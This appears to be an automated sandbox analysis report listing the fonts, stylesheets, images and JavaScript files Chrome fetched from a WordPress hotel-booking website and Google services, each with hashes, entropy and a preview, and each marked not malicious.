              Preview:@font-face {. font-family: 'Flaticon';. src: url('../fonts/Flaticon.eot');. src: url('../fonts/Flaticon.eot#iefix') format('embedded-opentype'),. url('../fonts/Flaticon.ttf') format('truetype'),. url('../fonts/Flaticon.woff2') format('woff2'),. url('../fonts/Flaticon.woff') format('woff'),. url('../fonts/Flaticon.svg#Flaticon') format('svg');. font-weight: normal;. font-style: normal;. font-display: block;.}..[class^="flaticon-"]:before, [class*=" flaticon-"]:before,.[class^="flaticon-"]:after, [class*=" flaticon-"]:after { . font-family: 'Flaticon' !important;. speak: none;. font-style: normal;. font-variant: normal;. text-transform: none;.. /* Better Font Rendering =========== */. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;.}...flaticon-cell-phone:before { content: "\f100"; }..flaticon-straight-quotes:before { content: "\f101"; }..flaticon-blocks-with-angled-cuts:before { content: "\f102"; }..flaticon-business:before { conte
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text
              Category:downloaded
              Size (bytes):18203
              Entropy (8bit):4.862577309228259
              Encrypted:false
              SSDEEP:
              MD5:F88CA01B8B37D2A0BC647D6E31D0B0B6
              SHA1:5B3900EEB400EBCCDCDAA2739647708E22A32DDA
              SHA-256:85C64B6A74B05EAEDFEF087C1D49C86B2A534BB69E463E6214E08E978EE00F88
              SHA-512:9F0F6CAA5FBC7CCD23039C9407A6AFFC3F9BD2EBA4331834AFD17D15885826C4AB1E0068D76F8FF7CF5CFD5566E72629F1FBF0888A75760B8B108DD4AED401C9
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/css/themify-icons.css?ver=1726496070
              Preview:@font-face {..font-family: 'themify';..src:url('../fonts/themify.eot?-fvbane');..src:url('../fonts/themify.eot?#iefix-fvbane') format('embedded-opentype'),...url('../fonts/themify.woff?-fvbane') format('woff'),...url('../fonts/themify.ttf?-fvbane') format('truetype'),...url('../fonts/themify.svg?-fvbane#themify') format('svg');..font-weight: normal;..font-style: normal;.}..[class^="themify-"], [class*=" themify-"] {..font-family: 'themify';..speak: none;..font-style: normal;..font-weight: normal;..font-variant: normal;..text-transform: none;.../* Better Font Rendering =========== */..-webkit-font-smoothing: antialiased;..-moz-osx-font-smoothing: grayscale;.}...themify-wand:before {..content: "\e600";.}..themify-volume:before {..content: "\e601";.}..themify-user:before {..content: "\e602";.}..themify-unlock:before {..content: "\e603";.}..themify-unlink:before {..content: "\e604";.}..themify-trash:before {..content: "\e605";.}..themify-thought:before {..content: "\e606";.}..themify-targe
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:dropped
              Size (bytes):7714
              Entropy (8bit):7.976148070251695
              Encrypted:false
              SSDEEP:
              MD5:12846F37311AD795E663A7D5ABE12F62
              SHA1:6F97211BB3AB3ADCE87CCD36DBE17847940627B3
              SHA-256:0947EDAD483F37A7B8FFC39CB3BD3F9B9FF519261844245EC4DC7D224359D49E
              SHA-512:D1207FD6EBC92DFFB822F42AF0CAEC21FDBECF6B59D749D1A21F9320D8DBFAD78AE0100D67227DDA78623E27873E645DB449C554B685FA22FE6CDFEB4713AF5A
              Malicious:false
              Reputation:unknown
              Preview:RIFF....WEBPVP8L..../..?...:.m%.]?I.....v.4XG....v`....pg.....%8[....a.N\.....%b.N...H.%...............H........r..5.,.u..D]..Y$..$......=H.h7.wX.|..}/.0Y...n5.j......}`T..k.......U.K6"....U..V.uf.......:..7...%.*..gD.....|...lIDo..q.>..i.g.....<..aK.TB.2..,.l..W.P..B......\,5`/~............-.....$/.9aI...vw.".h...z..o..-..W:-3."....o....)...:u....ePw....%....;.X.+.0..^...^{l.....K.../.ZB..'...>.RW.............z)..[....>6.^...+ ....=-....b........~.......?d....f....O..P..q....;.M.xL.K.....E.O.iY...go.[..l.=.[z...~iK.....Y].N....<...o...O.mqzL.~.C.HOK.......%......W(.kW>.Ndoe.....- (.@W...x.......... .t....MDv...<u~......k/^..._.._..?].._.vx]..n)Gy.Y........~^...V.V/...~.j../..T.>..o..K.X..N"..vQ.M,W...ew.fw5d.N.........2.....$.D$...N.Z.SW....I..v...;.R.+d ...i.....t~@d/H8.r". B..../@..ND.-Ev.....%".DD. f.{..W>.;....U...?j).....7+O..N..[.@o[.A/e6p..P..u....fK...e.....0..#.6....t`.e.......d..\T....a=k..6+={..yh.....2.........#.H...J..nK;..... ."
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:Web Open Font Format (Version 2), TrueType, length 17940, version 1.0
              Category:downloaded
              Size (bytes):17940
              Entropy (8bit):7.987142256849806
              Encrypted:false
              SSDEEP:
              MD5:3387BE02BEF2E06C84DFC7087B303C3B
              SHA1:F6385439BE034485F5A11C061329036AD2CE08CB
              SHA-256:EE82F41E7631B1C36989A863EED9CCA083761EAB010490D1CBD48DA253FBB69E
              SHA-512:6C4249157BC9397D4B819F2996B1159409C4EE96E26C7D249940409A8D067BBCDDCB8D2C3D25E49DA07DAD65CBF5E9E71E3186195D1D90ED8C4C7D4A9847F3A6
              Malicious:false
              Reputation:unknown
              URL:https://fonts.gstatic.com/s/sarala/v12/uK_y4riEZv4o1w9hDRcS.woff2
              Preview:wOF2......F........4..E..........................:.....b.`..\.8..k.....|..-..J..6.$.... ..........o....;..Poj..`. <<6...........r.I.i..v?D.ED...jK..U..F.....J...>.w.T%.=..e}..*..q.Y.....A.$..2..?..h.~.@....7.|T..L.....?.I....~.[.}.......7.,^.K.H.K..L..y.!.....i........\.@....>._.....B.NV.2/k.}...d..52.'s&..;Y].<...5.t.no.W....]..G...r<. ...QEC.:>8.ZW.6h.=..o./.#..qU.IU..u.......!;.......$..;.V.Z ..e....Tz.\..'...,#.2.j.1...?..{.vv....Pb1.mD....k..n..:...-.\..../.p.D.l....2.....%.O..e&..../t.....^I..id.-.h.+~......../..O.2N.W.=.}^[!.b&}UK.:.|...|8.+t..l.T.v.)r.r.v....o.....O-..9.$..M.?m.h.....H.)....g..<.....>.n$....T..~...|..l..N.V.h.F.C.tB%D.........x...e.".bQ....r.rQ.......#p.ZN X...28HHx.......6qS...U)....J.^wm.ByE..c.V.H~.QT$.:.t;3.....1.. ....$.h.........nZ.( .....fC...5c........n..,r......Zj9b...7.../..|...O....*Fo.1...(........Y...L4.!s...;. ..A#@[...d..@.z.p...\ew.^......K.@...zF..<...K9.(.8Hd.P.u.6...I....2..[.8.!..[....@..H...p
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (7407), with no line terminators
              Category:dropped
              Size (bytes):7407
              Entropy (8bit):5.193807757476222
              Encrypted:false
              SSDEEP:
              MD5:08C43DF781F4817AEDAE6BEB563576EF
              SHA1:BC7B7FDB3056D5C31E4542A3A453E0B492213686
              SHA-256:7014760D4015AC6A23C468981A88863376E7C23AF21F04E526FE23CE9056C9A5
              SHA-512:922650176054659F29A9CE54F8DDC71AAB6C854FA0B18A8D0E723D52A5DD696376A010BBBB6FD27856AFE839F953CAB178BA72F717C265E0141FE690388C871A
              Malicious:false
              Reputation:unknown
              Preview:!function(){const e=document.querySelectorAll(".hb-price-field"),t=document.querySelectorAll(".hb-rating-field"),r=document.querySelectorAll(".hb-type-field"),a=e=>{const t=window.location.search;return new URLSearchParams(t).get(e)},n=e=>{const t=hotel_settings.currency_symbol||"",r=hotel_settings.currency_position||"left";switch(e=c(e),r){case"left":e=t+e;break;case"right":e+=t;break;case"left_with_space":e=t+" "+e;break;case"right_with_space":e=e+" "+t}return e},c=e=>{const t=hotel_settings.number_decimal||0,r=hotel_settings.thousands_separator||"";return(e=(e/1).toFixed(t)).toString().replace(/\B(?=(\d{3})+(?!\d))/g,r)},l=()=>{if(document.querySelector(".hb-selection-field")){if(e.length)for(let t=0;t<e.length;t++)e[t].querySelector(".hb-price-range").noUiSlider.on("update",(function(e,t,r){const a=parseInt(e[0]),c=parseInt(e[1]);o("price",a+"-"+c,n(a)+"-"+n(c))}));if(t.length&&[...t].map((e=>{[...e.querySelectorAll('input[type="checkbox"]')].map((e=>{if(e.checked){const t=e.value,
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (1391)
              Category:downloaded
              Size (bytes):1426
              Entropy (8bit):5.2713128211306
              Encrypted:false
              SSDEEP:
              MD5:19D386C9004E54941C1CC61D357EFA5D
              SHA1:0A77594006C8D86FDCC0ADBC2B9AECAEF3869586
              SHA-256:3BC6467A95CEC8FA516C6F5F69E1301E37E16F9BB1046FE7756729249F901B95
              SHA-512:7811CF6BABB4DF41707F97D1BD65337B5AD7AAEDFF301FCEDB90FB7773FA9876F52458AA03A576910F6126384599EF25F8DE76EE309C22E1914D9CF444AEFB6F
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-includes/js/wp-util.min.js?ver=6.6.2
              Preview:/*! This file is auto-generated */.window.wp=window.wp||{},function(s){var t="undefined"==typeof _wpUtilSettings?{}:_wpUtilSettings;wp.template=_.memoize(function(e){var n,a={evaluate:/<#([\s\S]+?)#>/g,interpolate:/\{\{\{([\s\S]+?)\}\}\}/g,escape:/\{\{([^\}]+?)\}\}(?!\})/g,variable:"data"};return function(t){if(document.getElementById("tmpl-"+e))return(n=n||_.template(s("#tmpl-"+e).html(),a))(t);throw new Error("Template not found: #tmpl-"+e)}}),wp.ajax={settings:t.ajax||{},post:function(t,e){return wp.ajax.send({data:_.isObject(t)?t:_.extend(e||{},{action:t})})},send:function(a,t){var e,n;return _.isObject(a)?t=a:(t=t||{}).data=_.extend(t.data||{},{action:a}),t=_.defaults(t||{},{type:"POST",url:wp.ajax.settings.url,context:this}),(e=(n=s.Deferred(function(n){t.success&&n.done(t.success),t.error&&n.fail(t.error),delete t.success,delete t.error,n.jqXHR=s.ajax(t).done(function(t){var e;"1"!==t&&1!==t||(t={success:!0}),_.isObject(t)&&!_.isUndefined(t.success)?(e=this,n.done(function(){a&&
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:Web Open Font Format (Version 2), TrueType, length 18596, version 1.0
              Category:downloaded
              Size (bytes):18596
              Entropy (8bit):7.988788312296589
              Encrypted:false
              SSDEEP:
              MD5:C83E4437A53D7F849F9D32DF3D6B68F3
              SHA1:FABEA5AD92ED3E2431659B02E7624DF30D0C6BBC
              SHA-256:D9BADA3A44BB2FFA66DEC5CC781CAFC9EF17ED876CD9B0C5F7EF18228B63CEBB
              SHA-512:C2CA1630F7229DD2DEC37E0722F769DD94FD115EEFA8EEBA40F9BB09E4FDAB7CC7D15F3DEEA23F50911FEAE22BAE96341A5BACA20B59C7982CAF7A91A51E152F
              Malicious:false
              Reputation:unknown
              URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
              Preview:wOF2......H...........H=................................|.`..J.H..<........>..Z...x.6.$..0. ..~. ..)...%.m..t.D<...U.c....D....@........@e..a..R./<...p..q..q....S<.nm...X..(ER....e.....O.?Q_..FYH......ml.E..?;X0>.f.Y.,.n.a...._h8c.006U.cS..3.m.Or..I9..5.;.=..'!..c.O...W.K..f....k..&Xq..Y?.r...%.S..y.:q*.......u*D.d.R..'..Q,L.... e`..=?.{...e%{.....3+$.....NkF2...... ._}..2]....,.F.u.S4O.~w).G..../]}6.nVwKj.h@........5.7P....i..r........U?.........q..Cm......g...\.zu.....P..|....5G$...4k$..L..g..".y..?..6...O...e..@..0TYh..v........M.....#B...O.i.G$.Bq..m.A.s~...A...c.....25K.....B..<..w.A....G.O...A......A,y"q....q<....N..{Ta..!.|vzo.;9.5>.>....7I.i.Ld.4..y...].g.....'m_(...O-..}.K.(....R..2.q.z9.D..]..$.#$.:x..:{..m.OF...K[J. ......lpH.#%V....4.;l.<..J.6.T..a...I..|..zj.k.-...y...#..e.1,s....<.HX.....z{L....'.$. "..tY..m.<.\8P. a.......x.W\.b.%...RA.\.... M.......v1......#...............`.c..%.Nc.d.qP.68....$<.O.S_7...U.].jn>@.3.c..wO..>.>a.qg....\..kb.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text
              Category:downloaded
              Size (bytes):2894
              Entropy (8bit):5.130108035080603
              Encrypted:false
              SSDEEP:
              MD5:3FD2AFA98866679439097F4AB102FE0A
              SHA1:DBC9C4139E49D0D9FB41B7191AAD1A2DB6C555FD
              SHA-256:CCD31FFA708D025833F954B3E0560CEDD58DF9A0D2706B2CCEE5F501C5B2467B
              SHA-512:82811EF42ABD80CBEBD4A74D35475FC3871478FC25A486B08BB7E04921B7824DB56C56B2191E9AB56A421552B483A2E64F966396711E5F248AFAE9D1DED22CB2
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.9.8
              Preview:.wpcf7 .screen-reader-response {..position: absolute;..overflow: hidden;..clip: rect(1px, 1px, 1px, 1px);..clip-path: inset(50%);..height: 1px;..width: 1px;..margin: -1px;..padding: 0;..border: 0;..word-wrap: normal !important;.}...wpcf7 form .wpcf7-response-output {..margin: 2em 0.5em 1em;..padding: 0.2em 1em;..border: 2px solid #00a0d2; /* Blue */.}...wpcf7 form.init .wpcf7-response-output,..wpcf7 form.resetting .wpcf7-response-output,..wpcf7 form.submitting .wpcf7-response-output {..display: none;.}...wpcf7 form.sent .wpcf7-response-output {..border-color: #46b450; /* Green */.}...wpcf7 form.failed .wpcf7-response-output,..wpcf7 form.aborted .wpcf7-response-output {..border-color: #dc3232; /* Red */.}...wpcf7 form.spam .wpcf7-response-output {..border-color: #f56e28; /* Orange */.}...wpcf7 form.invalid .wpcf7-response-output,..wpcf7 form.unaccepted .wpcf7-response-output,..wpcf7 form.payment-required .wpcf7-response-output {..border-color: #ffb900; /* Yellow */.}...wpcf7-form-contro
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (1575)
              Category:dropped
              Size (bytes):3512
              Entropy (8bit):5.287598978527003
              Encrypted:false
              SSDEEP:
              MD5:130DCB2B7B0C778F785A464D8733A6BA
              SHA1:0C98683280FDA39657CD6604CD68D902474923B2
              SHA-256:C3FAAD5791A6C2694A95A8C880673E0EF2FEA00C91AAB8A39B80FAF9869E6C32
              SHA-512:3B64621EE4D3442C74E2A08A6AFAC3A29246ADD0B423B821863C1069872206FE4FD7AD88633800DF7057AEE2E9839CA439C3E861C16E9063A9DF6A0D7815F0C0
              Malicious:false
              Reputation:unknown
              Preview:google.maps.__gjsload__('search_impl', function(_){var hyb=function(a,b){_.ch(a.Gg,1,b)},iyb=function(a,b){_.ch(a.Gg,3,b)},myb=function(a,b,c){var d=new jyb;d=_.UG(d);c.Ir=d.load.bind(d);c.clickable=a.get("clickable")!==!1;_.sYa(c,_.qQ(b));b=[];b.push(_.Ak(c,"click",kyb.bind(null,a)));for(const e of["mouseover","mouseout","mousemove"])b.push(_.Ak(c,e,lyb.bind(null,a,e)));b.push(_.Ak(a,"clickable_changed",()=>{a.Eg.clickable=a.get("clickable")!==!1}));a.Fg=b},kyb=function(a,b,c,d,e){let f=null;if(e&&(f={status:e.getStatus()},e.getStatus()===0)){f.location=._.W(e.Gg,2)?new _.mk(_.Ts(_.J(e.Gg,2,_.Zs).Gg,1),_.Ts(_.J(e.Gg,2,_.Zs).Gg,2)):null;const g={};f.fields=g;const h=_.Ai(e.Gg,3);for(let k=0;k<h;++k){const m=_.Yq(e.Gg,3,_.CQ,k);g[m.getKey()]=m.getValue()}}_.Mk(a,"click",b,c,d,f)},lyb=function(a,b,c,d,e,f,g){let h=null;f&&(h={title:f[1].title,snippet:f[1].snippet});_.Mk(a,b,c,d,e,h,g)},nyb=function(){},oyb=class{},pyb=class extends _.U{constructor(){super()}Oi(){return _.Xi(this.Gg,2)}},
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:PNG image data, 322 x 322, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):2898
              Entropy (8bit):7.330731610204751
              Encrypted:false
              SSDEEP:
              MD5:0117F1989A737607D9CE57D26E1879DA
              SHA1:CE2AF662F4BA8CA570B52579470A66DF8A4C14A5
              SHA-256:AACA4A8FCD6D231123C175C2367A820D9CFC28BE56EDAE2630E7BE1AE6491A79
              SHA-512:A1B27D3B05957D33DE7068B2A834C5F15A56555600FA6B12A415C51D176C4D19A321A3E42D76AB4DF6A538C16D1ABEBEAF4CB313F6D33CBE467CCE2D9C48D668
              Malicious:false
              Reputation:unknown
              Preview:.PNG........IHDR...B...B............tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8123eb9b-07c2-9a4c-9488-c51c15428c53" xmpMM:DocumentID="xmp.did:D5AEFFF990F011EA8A71D21E1CFDEAE9" xmpMM:InstanceID="xmp.iid:D5AEFFF890F011EA8A71D21E1CFDEAE9" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3bd38516-daff-0c47-b102-7f94d33c0808" stRef:documentID="adobe:docid:photoshop:8395f396-3792-d241-9a19-7c0f82d094f9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.DL4...iIDATx.....Te.....]
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1707, components 3
              Category:downloaded
              Size (bytes):307565
              Entropy (8bit):7.9200992385429165
              Encrypted:false
              SSDEEP:
              MD5:FE364B6B59F04C54D274806B74DC3534
              SHA1:5A72E0353DB44F6871081F0558811F34EB8A7EB4
              SHA-256:27B14B165A8875E340BCCD1A4A5B2F7BE0A86DB27F081728209981F96702D189
              SHA-512:FD47C9D87E17E802B902DCE8CE60805A44001ED836A31ABD678F72604DABD0751CFFF29F7497F26F56C703C8CAE6E8E5E974709EFA360E27BCBF2ED75ECF735B
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/uploads/2021/04/2021_4_X_0134-scaled.jpg
              Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..qKE-|...JZ(. ".)h..E...(....JQE.0.QE..(.../J(..bR.....R.....P0...1@.E...AE...p...@...(...............IKE...b.......b...R.P1)h... .(....E...J.)...$..:sN......(.....(...-%..- .{QE....3HE-.....(.~..:_.6..P}y..S('.Q.[..j.?..>.....w.....E*.C.$.j.Xd.6.n...Fk*+......I.D.....FH.T.-.(..e....CO.=k+2...P0.....%%-.P
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1339, components 3
              Category:downloaded
              Size (bytes):888275
              Entropy (8bit):7.978407331919979
              Encrypted:false
              SSDEEP:
              MD5:35D6E5EFC4CC1667700B2CFD72E1C879
              SHA1:ED61F8F88F319385488FEF9E83FA21E693D21B9B
              SHA-256:C0CF636208876826794F3886A88EB7734CC8349869A0220F8BE82C3247290899
              SHA-512:79ECA27E3C0272A5607824A55794EF5562172D1F3B06A305061EE9852BF341333F3DDA7EEEB606C51C4DC671E5C5436E752592569975A8B3D03BB772184C31FD
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/uploads/2022/01/waterfall-1-scaled.jpg
              Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......;...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...U...$....+..:.:l......8d<....'.`.[..y....;.q....O{6......3.=...5]_...N..,m....\<...2g..9<w..W5sb5./.).|9eF9.{.....++.".4`*.........w.0.............6..wy..b.....G..N}........G..B..M.Pw.>.+.......R]......J...It..z.......8..5....T..u...f.1../.WM...k.....d...T.....o.........s...};....$.h.@......f
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:PNG image data, 249 x 259, 8-bit/color RGBA, non-interlaced
              Category:downloaded
              Size (bytes):8162
              Entropy (8bit):7.900288484124953
              Encrypted:false
              SSDEEP:
              MD5:CC9233F855967870D50A21E2F36FC0EA
              SHA1:AD1166AB1D654BFEBAE394D982CD1CD8D41AC1A4
              SHA-256:97BAF96A21B240081C070B6E0832B02BBC83D867EF12E782908F2D91CB3B6AB4
              SHA-512:6FC2F1E6FECB66B8DEF2C97084904CC871DC471F6F625C4378159CA36B8B179B1312A94AF8E915DBC0508292F332BF922C89579F59D16764A4627567C86FDAE3
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/images/icons/patterns/tri-3.png
              Preview:.PNG........IHDR..............1.[....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8123eb9b-07c2-9a4c-9488-c51c15428c53" xmpMM:DocumentID="xmp.did:6AD368558F8E11EAA8038025D132B9AF" xmpMM:InstanceID="xmp.iid:6AD368548F8E11EAA8038025D132B9AF" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8ae1fc1d-3bfc-7843-a9e2-d8ff93039b9d" stRef:documentID="adobe:docid:photoshop:2420475d-5531-7449-96d8-a2e2c41897b8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.8<I....IDATx...p.u.._.;/.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:exported SGML document, ASCII text, with very long lines (18124), with no line terminators
              Category:downloaded
              Size (bytes):18124
              Entropy (8bit):5.2049393475810355
              Encrypted:false
              SSDEEP:
              MD5:08DBCE585312A60D86C0E4D755C1DDD0
              SHA1:EB064B16B6413F54B1DD2C8F02051E72F18370A2
              SHA-256:28E79630659C9DEF3AB3FC26FCED8845B50ADEE8940061CC99FE808923458C55
              SHA-512:6F1FE34CB517E22AF2C7FD68EB8CE51BF58E7CEF897063520FA4A4A4265B213D2C0E10D0ACEFAEDF8831D1F525052CF1BFA3AFBB2A154DEDA9107BF3B5F54C29
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/wp-hotel-booking/assets/dist/js/frontend/hotel-booking.min.js?ver=2.1.1-02
              Preview:!function(t){var e,a=t(document);function n(t){return Number(t)||t%1==0}function i(t){return new RegExp("^[-!#$%&'*+\\./0-9=?A-Z^_`a-z{|}~]+@[-!#$%&'*+\\/0-9=?A-Z^_`a-z{|}~]+.[-!#$%&'*+\\./0-9=?A-Z^_`a-z{|}~]+$").test(t)}function o(e){if(!t.isPlainObject(e)){var a=e.match(/ HB_AJAX_START -->(.*) HB_AJAX_END -->/);try{e=a?t.parseJSON(a[1]):t.parseJSON(e)}catch(t){e={}}}return e}function r(){var e=t(this),a=t('input[name="existing-customer-email"]');if(!i(a.val()))return a.addClass("error"),void a.focus();e.attr("disabled",!0),a.attr("disabled",!0);var n=t(".hb-col-padding.hb-col-border");t.ajax({url:hotel_settings.ajax,dataType:"html",type:"post",data:{action:"hotel_booking_fetch_customer_info",email:a.val(),nonce:hotel_settings.nonce},beforeSend:function(){n.hb_overlay_ajax_start()},success:function(i){if(n.hb_overlay_ajax_stop(),(i=o(i))&&i.ID){var r=t("#hb-order-new-customer");for(var l in i.data){var _=l.replace(/^_hb_customer_/,"");r.find('input[name="'+_+'"], select[name="
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text
              Category:downloaded
              Size (bytes):11931
              Entropy (8bit):5.1514319796029975
              Encrypted:false
              SSDEEP:
              MD5:120899C68654AAFC752180D150F08676
              SHA1:250E84CE1C5A7E56A28B0E8E1518138BC5B4FA2B
              SHA-256:AB639C167F6BDD1A9E2103DA68A8144B2F457C3EB514EC0E616C26F9EDC8517F
              SHA-512:89241AD41B05406E218E8ECD767D3363BEF3F5388D974EC29038DADAD110004F97B891C1A7008A267F8C4C0CF64A19FE42A224BF807CBD77353574827D1D3C36
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/js/custom-script.js?ver=1726496070
              Preview:(function($) {...."use strict";....//Hide Loading Box (Preloader)..function handlePreloader() {...if($('.preloader').length){....$('body').addClass('page-loaded');....$('.preloader').delay(1000).fadeOut(0);...}..}...//Update Header Style and Scroll to Top..function headerStyle() {...if($('.main-header').length){....var windowpos = $(window).scrollTop();....var siteHeader = $('.main-header');....var scrollLink = $('.scroll-to-top');....var sticky_header = $('.main-header .sticky-header');....if (windowpos > 120) {.....siteHeader.addClass('fixed-header');.....sticky_header.addClass("animated slideInDown");.....scrollLink.fadeIn(300);....} else {.....siteHeader.removeClass('fixed-header');.....sticky_header.removeClass("animated slideInDown");.....scrollLink.fadeOut(300);....}...}..}....headerStyle();...//Submenu Dropdown Toggle..if($('.main-header li.dropdown ul').length){...$('.main-header .navigation li.dropdown').append('<div class="dropdown-btn"><span class="fa fa-angle-right"></span
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (367)
              Category:dropped
              Size (bytes):52224
              Entropy (8bit):5.084373179122701
              Encrypted:false
              SSDEEP:
              MD5:B9088C94738C3A2C95184E45D0B5F854
              SHA1:BAD4F5162BE5A45A8BA9A44A2AF2C7A2315BA725
              SHA-256:1288ABB45B62709DEFEC307FB4668ECE7B0259D02B4A6770DA169867B29258CF
              SHA-512:C0C06199AD7018561244A5D8565BABB57A94D99DAB691A09E4B68C7DDC6EA33BDF03E7E540240BC071CD08A42C7D09F91C4EF5A75A094FFC02A3C622C99D4B97
              Malicious:false
              Reputation:unknown
              Preview:/**!. * MixItUp v2.1.10. *. * @copyright Copyright 2015 KunkaLabs Limited.. * @author KunkaLabs Limited.. * @link https://mixitup.kunkalabs.com. *. * @license Commercial use requires a commercial license.. * https://mixitup.kunkalabs.com/licenses/. *. * Non-commercial use permitted under terms of CC-BY-NC license.. * http://creativecommons.org/licenses/by-nc/3.0/. */..(function($, undf){..'use strict';..../**.. * MixItUp Constructor Function.. * @constructor.. * @extends jQuery.. */....$.MixItUp = function(){...var self = this;......self._execAction('_constructor', 0);......$.extend(self, {......../* Public Properties....---------------------------------------------------------------------- */........selectors: {.....target: '.mix',.....filter: '.filter',.....sort: '.sort'....},.........animation: {.....enable: true,.....effects: 'fade scale',.....duration: 600,.....easing: 'ease',.....perspectiveDistance: '3000',.....perspectiveOrigin: '50% 5
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (2628)
              Category:downloaded
              Size (bytes):80317
              Entropy (8bit):5.468754954747343
              Encrypted:false
              SSDEEP:
              MD5:9E45E14D943A3C89CAEA5EA1F51CF2F7
              SHA1:9D90D2060879081FDC26D8123755485F224A9398
              SHA-256:181C43D9980657ABCB0A4F42521EAB1C8755E5112CE897F98F9F23C971FE5229
              SHA-512:D30019E3B12664C1208610FD8EFFA36A3825650C05BBE8306680E9A52081C18E0F355FFB445E154385D20EC805688424B85F18E3504B3FA4135A29C05068F6E5
              Malicious:false
              Reputation:unknown
              URL:https://maps.googleapis.com/maps-api-v3/api/js/58/10/map.js
